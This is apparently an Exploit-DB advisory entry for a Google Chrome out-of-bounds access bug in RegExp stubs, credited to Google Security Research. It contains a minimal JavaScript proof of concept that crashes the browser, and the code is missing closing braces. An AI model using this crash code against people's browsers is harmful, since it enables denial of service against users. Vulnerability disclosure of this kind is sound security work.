Google Chrome - Out-of-Bounds Access in RegExp Stubs

EDB-ID: 42286
Author: Google Security Research
Published: 2017-06-30
Type: Dos
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: Out Of Bounds
Vulnerable App: N/A

A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.

var re;
function f(){
for(var i = 0; i < 100; i++){
re["test" + i] = 0x77777777; // make a dict
return 0;

re = /-/g;
var str = '2016-01-02';
re.lastIndex = {valueOf : f};
result = re.exec(str);

This PoC crashes on google-chrome-beta on Linux.

Proof of Concept:

Related Posts